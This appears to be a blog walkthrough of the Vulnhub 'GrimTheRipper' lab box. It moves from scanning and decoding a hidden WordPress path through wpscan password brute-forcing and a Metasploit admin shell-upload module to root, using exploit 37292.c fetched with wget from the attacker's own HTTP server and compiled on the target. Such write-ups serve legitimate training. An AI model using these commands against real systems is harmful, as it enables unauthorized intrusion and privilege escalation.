Vulnhub – GrimTheRipper Walkthrough

We scan the box with nmap –A –T4 –p- –vv

We use dirb /usr/share/dirb/wordlists/big.xt

When viewing the source on the path we get this:

THpFd01UQXhNREU9IHRyeSBoYXJk when decoding it as base64 we get:

LzEwMTAxMDE= try hard then decoding LzEwMTAxMDE again gave use :

/1010101 a new path, when viewing it it’s a WordPress path:

Running wpscan to enumerate the usernames found the username admin, so we can try to brute force it :

Wpscan –url -U admin -P /root/pass/rockyou.txt –v

We got the password Password@123 , but when trying to login we get directed to, so wo going to try Metasploit:

use exploit/unix/webapp/wp_admin_shell_upload

set TARGETURI /1010101/wordpress

set rhosts

set password Password@123

set username admin

A simple cat /etc/issue gave us Ubuntu 12.04.5 LTS, and using searchsploit we get:

Exploit 37292.c

The we transfer the exploit to the target machine using python –m SimpleHTTPServer 80, and on the target machine in the /tmp folder we do wget 37292.c

We compile it using gcc –o script 37292.c and then we run it ./script and we got ROOT and that’s it no flag to capture.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s